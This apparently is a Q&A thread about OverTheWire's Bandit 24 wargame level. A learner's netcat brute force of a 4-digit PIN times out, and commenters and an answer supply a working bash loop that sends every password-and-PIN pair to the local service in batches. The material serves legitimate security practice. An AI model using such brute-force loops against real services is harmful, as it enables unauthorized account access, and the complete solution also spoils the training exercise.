# Bandit 24 Brute Forcing Time Out

Tags: bash, shell

I am going through the problems at https://overthewire.org/wargames/bandit/ to try to learn more about linux and cybersecurity. I have run into a problem with [problem 24](https://overthewire.org/wargames/bandit/bandit25.html).

I understand the gist of what I have to do. I created a bash script that generates the possible pins with the last password and saved them to a file separated by line breaks. Then I tried to run the local network at the port using the file with the pins as input. This seems to work for quite a while, but then times out with the exit code `Timeout. Exiting.` I don't know what this means, and I don't know how how to fix this. Is there an error in my code? Is there some sort of flag that works around the timeout? Any help is appreciated. I am still fairly new to linux.

This is my code which created the pins:

```bash
#!/bin/bash

password="<password here>"

for pin in {0000..9999}
do
    echo $password $pin
done
```

I then run bash pincoder.sh > possible_pins.txt. I then try to run `nc localhost 30002 < possible_pins.txt`. I receive `Wrong! Please enter the correct current password. Try again.` for quite a long time as expected, but at the end receive `Timeout. Exiting.`

I have tried to find help on this on the web, but haven't found much. I have found a couple pages walking through how to solve the problem, but some would force me to go an entirely new direction with complicated bash scripts that do not make sense to me. I would rather go down this path because it makes sense to me. I found a couple that do go down this path, but they are essentially doing what I am doing, but it seems that they don't have any problems of the program crashing. I haven't found anyone else with the same problem. I tried adding a `-w` flag with a long wait time to `nc`, but the program still crashed.

Comment: "will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode" so you'll need more than just the pin. The pins you generate are as "0 0 0 0" (note the spaces) which seems like an unlikely way to format a pin. Your `nc` command line just dumps the entire file into the connection; are you sure that's what you want?

Comment: `seq -w 0 1 9999` may be a bit shorter. Or even `seq -w 9999` if you don't need 0000.

Comment: @Ouroborus you are correct. I was sending the wrong thing. I updated my script to use the password as well as the pin, but I am still getting the error.

Comment: @Jens I tried doing it the seq way, but still ran into the same problem.

Comment: Is `$pin $password` the correct format, the description seems to say its the other way around? Is the space between them required? What about separation between attempts (is EOL correct or do you need to reconnect)? Is the timeout caused by `nc` or is it caused by the server?

Comment: "but some would force me to go an entirely new direction with complicated bash scripts that do not make sense to me" - "It's too hard" is a particularly poor reason in this scenario.

Comment: @Ouroborus I'm just trying to understand why my code is failing. If going in that other direction is required I'll happily do it, but for these problems I would rather struggle with my own solutions than copy paste something and it work. And I'm really not sure if it's the server or nc that is timing out. Do you have any inclination to which is the problem?

Comment: Sure. It's that you're submitting the password in the wrong format and/or not using the right strategy in submitting the password. Anything you get here is mostly educated guessing since I don't think anybody here can complete that puzzle without also having done all the previous ones so there's nobody to tell you what success looks like.

Comment: As for your timeout, that may be the host closing the connection. You'd have no control over that. A work around is to submit your candidates in smaller batches.

Comment: @Ouroborus That worked perfectly. I split it up into two batches and it worked. Thanks so much for your help!

Answer (score 0):

I ran into the same problem. First, I tried to break into 10 parts, but it still had the timeout problem. Secondly, I used the `-w` option on `nc`, to set the timeout manually to 99999 seconds or something like that, and that worked. Here's the complete script (note that it may take a while to finish):

```bash
#!/bin/bash

password=$(cat /etc/bandit_pass/bandit24)

for i in {0000..1000} 
do
    echo "$password $i"  
done | nc -w 999999 localhost 30002



for i in {1000..2000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002



for i in {2000..3000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002


for i in {3000..4000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002


for i in {4000..5000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002

for i in {5000..6000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002

for i in {6000..7000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002

for i in {7000..8000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002

for i in {8000..9000} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002

for i in {9000..9999} 
do
    echo "$password $i"  
done | nc -w 99999 localhost 30002
```

Run the script and print the results to a text file, then you can search the text file for the line with the password.